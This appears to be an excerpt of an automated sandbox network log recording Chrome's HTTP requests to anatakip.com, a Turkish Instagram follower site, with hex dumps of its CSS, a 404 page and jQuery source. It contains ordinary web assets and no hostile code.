                    2024-05-26 22:57:32 UTC1369INData Raw: 6e 74 61 77 65 73 6f 6d 65 3b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 63 22 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 72 65 6d 3b 63 6f 6c 6f 72 3a 23 33 33 63 34 62 36 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 70 61 6b 65 74 73 65 63 65 6e 65 6b 6c 65 72 69 20 2e 62 72 69 6c 6c 69 61 6e 74 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 33 33 63 34 62 36 7d 2e 70 61 6b 65 74 73 65 63 65 6e 65 6b 6c 65 72 69 20 2e 62 72 69 6c 6c 69 61 6e 74 3a 3a 62 65 66 6f 72 65 7b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 36 34 70 78 20 36 34 70 78 20 30 20 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 33 62 63 36 62 38 20 74 72 61 6e 73 70 61 72 65 6e
                    Data Ascii: ntawesome;content:"\f00c";font-size:1.3rem;color:#33c4b6;margin-right:3px}.paketsecenekleri .brilliant{border-color:#33c4b6}.paketsecenekleri .brilliant::before{width:0;height:0;border-style:solid;border-width:64px 64px 0 0;border-color:#3bc6b8 transparen
                    2024-05-26 22:57:32 UTC1369INData Raw: 66 6c 6f 61 74 3a 6c 65 66 74 3b 77 69 64 74 68 3a 33 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 61 75 74 6f 7d 2e 6c 67 2d 74 6f 6f 6c 62 61 72 7b 77 69 64 74 68 3a 37 30 25 7d 2e 6c 67 2d 61 63 74 69 6f 6e 73 20 2e 6c 67 2d 6e 65 78 74 7b 72 69 67 68 74 3a 63 61 6c 63 28 33 30 25 20 2b 20 32 30 70 78 29 7d 7d 2e 74 61 6c 6b 2d 62 75 62 62 6c 65 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 32 30 70 78 20 31 30 70 78 20 38 30 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 37 30 25 3b 68 65 69 67 68 74 3a 61
                    Data Ascii: float:left;width:30%;background:#fff;height:100%;text-align:left;padding:10px;overflow-y:auto}.lg-toolbar{width:70%}.lg-actions .lg-next{right:calc(30% + 20px)}}.talk-bubble{margin:10px 20px 10px 80px;display:block;position:relative;max-width:70%;height:a
                    2024-05-26 22:57:32 UTC1369INData Raw: 32 70 78 20 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 20 23 36 36 36 7d 2e 74 72 69 2d 72 69 67 68 74 2e 62 74 6d 2d 6c 65 66 74 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 20 27 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 61 75 74 6f 3b 74 6f 70 3a 61 75 74 6f 3b 62 6f 74 74 6f 6d 3a 2d 32 30 70 78 3b 62 6f 72 64 65 72 3a 32 32 70 78 20 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 20 23 66 66 66 7d 2e 74 72 69 2d 72
                    Data Ascii: 2px solid;border-color:transparent transparent transparent #666}.tri-right.btm-left:after{content:' ';position:absolute;width:0;height:0;left:0;right:auto;top:auto;bottom:-20px;border:22px solid;border-color:transparent transparent transparent #fff}.tri-r


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.549718104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:32 UTC628OUTGET /assets/nprogress/nprogress.css HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: text/css,*/*;q=0.1
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: style
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:32 UTC821INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:32 GMT
                    Content-Type: text/css
                    Content-Length: 1106
                    Connection: close
                    Cf-Bgj: minify
                    Cf-Polished: origSize=1532
                    cache-control: public, max-age=2592000
                    expires: Mon, 17 Jun 2024 12:52:13 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 727519
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n0%2FFA11eUp3EdaMGhCo%2FJJdiISoI5pjSMEdqBJxo8REbJNgx6d1p0pQBzA3WPgprp7wFYtKp%2FrhRhudJRaFqZf0Mebs6ElU4MuuthTqSgu4ythUhFgAIxuK%2BqvoXOSk%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d625bf76a5f-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:32 UTC548INData Raw: 23 6e 70 72 6f 67 72 65 73 73 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 23 6e 70 72 6f 67 72 65 73 73 20 2e 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 39 64 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 7a 2d 69 6e 64 65 78 3a 31 30 33 31 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 32 70 78 7d 23 6e 70 72 6f 67 72 65 73 73 20 2e 70 65 67 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31 30 70 78 20 23 32 39 64 2c 30 20 30 20 35 70 78 20 23 32 39 64 3b 6f 70 61 63 69 74 79 3a 31 3b 2d
                    Data Ascii: #nprogress{pointer-events:none}#nprogress .bar{background:#29d;position:fixed;z-index:1031;top:0;left:0;width:100%;height:2px}#nprogress .peg{display:block;position:absolute;right:0;width:100px;height:100%;box-shadow:0 0 10px #29d,0 0 5px #29d;opacity:1;-
                    2024-05-26 22:57:32 UTC558INData Raw: 6f 72 64 65 72 3a 73 6f 6c 69 64 20 32 70 78 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 32 39 64 3b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 23 32 39 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6e 70 72 6f 67 72 65 73 73 2d 73 70 69 6e 6e 65 72 20 34 30 30 6d 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6e 70 72 6f 67 72 65 73 73 2d 73 70 69 6e 6e 65 72 20 34 30 30 6d 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 2e 6e 70 72 6f 67 72 65 73 73 2d 63 75 73 74 6f 6d 2d 70 61 72 65 6e 74 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69
                    Data Ascii: order:solid 2px transparent;border-top-color:#29d;border-left-color:#29d;border-radius:50%;-webkit-animation:nprogress-spinner 400ms linear infinite;animation:nprogress-spinner 400ms linear infinite}.nprogress-custom-parent{overflow:hidden;position:relati


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.549723104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:33 UTC664OUTGET /assets/logo/logo.png HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:33 UTC742INHTTP/1.1 404 Not Found
                    Date: Sun, 26 May 2024 22:57:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: BYPASS
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MSO4u6hhEz8Hcno9nmUVRoQV5Qx3caGuGDqr6nuFxeLRl3IERZafoidcDHs62aIt1%2BPR7owy2Rj94S%2BN%2FWaHXLGCtf3ilabN1y8GWxzZChXxA2zGh%2FsaQuA76w9pEhk%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d66f88c7285-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:33 UTC627INData Raw: 31 63 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1c76<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:57:33 UTC1369INData Raw: 73 2f 73 74 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67 65 74 69 72 69 6e
                    Data Ascii: s/style/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Page Not Found | AnaTakip kendinizi instagram en iyi profili haline getirin
                    2024-05-26 22:57:33 UTC1369INData Raw: 63 6f 6c 6c 61 70 73 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 6c 65 66 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76
                    Data Ascii: collapse" aria-expanded="false"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button></div><div class="navbar-collapse collapse navbar-left"><ul class="nav
                    2024-05-26 22:57:33 UTC1369INData Raw: 3c 68 35 3e 4b 69 6d 6c 65 72 20 4b 75 6c 6c 61 6e 61 62 69 6c 69 72 3c 2f 68 35 3e 0a 3c 70 3e 49 6e 73 74 61 67 72 61 6d 20 c3 bc 79 65 6c 69 c4 9f 69 20 6f 6c 61 6e 20 68 65 72 6b 65 73 20 73 69 73 74 65 6d 69 20 6b 75 6c 6c 61 6e 61 62 69 6c 69 72 2e 20 49 6e 73 74 61 67 72 61 6d 20 68 65 73 61 62 c4 b1 6e c4 b1 7a 6c 61 20 67 69 72 69 c5 9f 20 79 61 70 c4 b1 6e 20 76 65 20 68 65 6d 65 6e 20 6b 75 6c 6c 61 6e 6d 61 79 61 20 62 61 c5 9f 6c 61 79 c4 b1 6e 2e 20 4b 75 6c 6c 61 6e c4 b1 6d 20 c3 bc 63 72 65 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73
                    Data Ascii: <h5>Kimler Kullanabilir</h5><p>Instagram yelii olan herkes sistemi kullanabilir. Instagram hesabnzla giri yapn ve hemen kullanmaya balayn. Kullanm cretsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div class
                    2024-05-26 22:57:33 UTC1369INData Raw: 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 63 6f 72 65 2f 63 6f 72 65 2e 6a 73 3f 76 3d 33 2e 31 2e 31 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 09 09 09 28 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 73 2c 20 6f 2c 20 67 2c 20 72 2c 20 61 2c 20 6d 29 20 7b 0a 09 09 09 09 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 72 3b 0a 09 09 09 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 28 69 5b 72 5d 2e 71 20 3d 20 69 5b 72 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 09 09 09 09 7d 2c 20 69 5b 72 5d
                    Data Ascii: pt><script src="/assets/core/core.js?v=3.1.10"></script><script type="text/javascript">(function (i, s, o, g, r, a, m) {i['GoogleAnalyticsObject'] = r;i[r] = i[r] || function () {(i[r].q = i[r].q || []).push(arguments)}, i[r]
                    2024-05-26 22:57:33 UTC1191INData Raw: 09 09 09 63 6f 6c 6f 72 3a 20 23 61 61 61 61 61 61 3b 0a 09 09 09 09 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6c 6f 73 65 3a 68 6f 76 65 72 2c 0a 09 09 09 2e 63 6c 6f 73 65 3a 66 6f 63 75 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 6d 6f 64 61 6c 2d 6f 70 65 6e 20 2e 6d 6f 64 61 6c 20 7b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 79
                    Data Ascii: color: #aaaaaa;float: right;font-size: 28px;font-weight: bold;}.close:hover,.close:focus {color: #000;text-decoration: none;cursor: pointer;}.modal-open .modal {overflow-x: hidden;overflow-y
                    2024-05-26 22:57:33 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.549722104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:33 UTC621OUTGET /assets/jquery/2.2.4/jquery.min.js?v=1 HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: */*
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: script
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01
                    2024-05-26 22:57:33 UTC770INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:33 GMT
                    Content-Type: application/javascript
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: public, max-age=604800
                    expires: Thu, 30 May 2024 11:17:08 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 301225
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3OooaweQW9gifOaxjWd2dyI%2F1IXMU%2FPiTuF5jxqape6MnZJxuhUtOhK1zz8dJHprKU4peS91iZSxq8nqTIC03kN9KBl043bYDvmTXlScDN2IKkE2KpgaABmVbjqWkpU%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d66fa9c41d3-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:33 UTC599INData Raw: 37 63 61 65 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 32 2e 32 2e 34 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20
                    Data Ascii: 7cae/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a
                    2024-05-26 22:57:33 UTC1369INData Raw: 28 29 7d 3b 6e 2e 66 6e 3d 6e 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 6a 71 75 65 72 79 3a 6d 2c 63 6f 6e 73 74 72 75 63 74 6f 72 3a 6e 2c 73 65 6c 65 63 74 6f 72 3a 22 22 2c 6c 65 6e 67 74 68 3a 30 2c 74 6f 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 61 3f 30 3e 61 3f 74 68 69 73 5b 61 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 61 5d 3a 65 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f
                    Data Ascii: ()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevO
                    2024-05-26 22:57:33 UTC1369INData Raw: 7d 2c 69 73 41 72 72 61 79 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 2c 69 73 57 69 6e 64 6f 77 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 61 26 26 61 3d 3d 3d 61 2e 77 69 6e 64 6f 77 7d 2c 69 73 4e 75 6d 65 72 69 63 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 26 26 61 2e 74 6f 53 74 72 69 6e 67 28 29 3b 72 65 74 75 72 6e 21 6e 2e 69 73 41 72 72 61 79 28 61 29 26 26 62 2d 70 61 72 73 65 46 6c 6f 61 74 28 62 29 2b 31 3e 3d 30 7d 2c 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 6e 2e 74 79 70 65 28 61 29 7c 7c 61 2e 6e 6f 64 65 54 79 70 65 7c 7c 6e 2e 69 73 57 69 6e 64 6f 77 28 61 29 29 72 65 74 75 72 6e 21 31 3b 69
                    Data Ascii: },isArray:Array.isArray,isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){var b=a&&a.toString();return!n.isArray(a)&&b-parseFloat(b)+1>=0},isPlainObject:function(a){var b;if("object"!==n.type(a)||a.nodeType||n.isWindow(a))return!1;i
                    2024-05-26 22:57:33 UTC1369INData Raw: 2e 6c 65 6e 67 74 68 3d 65 2c 61 7d 2c 67 72 65 70 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 2c 65 3d 5b 5d 2c 66 3d 30 2c 67 3d 61 2e 6c 65 6e 67 74 68 2c 68 3d 21 63 3b 67 3e 66 3b 66 2b 2b 29 64 3d 21 62 28 61 5b 66 5d 2c 66 29 2c 64 21 3d 3d 68 26 26 65 2e 70 75 73 68 28 61 5b 66 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 2c 67 3d 30 2c 68 3d 5b 5d 3b 69 66 28 73 28 61 29 29 66 6f 72 28 64 3d 61 2e 6c 65 6e 67 74 68 3b 64 3e 67 3b 67 2b 2b 29 65 3d 62 28 61 5b 67 5d 2c 67 2c 63 29 2c 6e 75 6c 6c 21 3d 65 26 26 68 2e 70 75 73 68 28 65 29 3b 65 6c 73 65 20 66 6f 72 28 67 20 69 6e 20 61 29 65 3d 62 28 61 5b 67 5d 2c 67 2c 63 29 2c 6e 75 6c 6c
                    Data Ascii: .length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,e,g=0,h=[];if(s(a))for(d=a.length;d>g;g++)e=b(a[g],g,c),null!=e&&h.push(e);else for(g in a)e=b(a[g],g,c),null
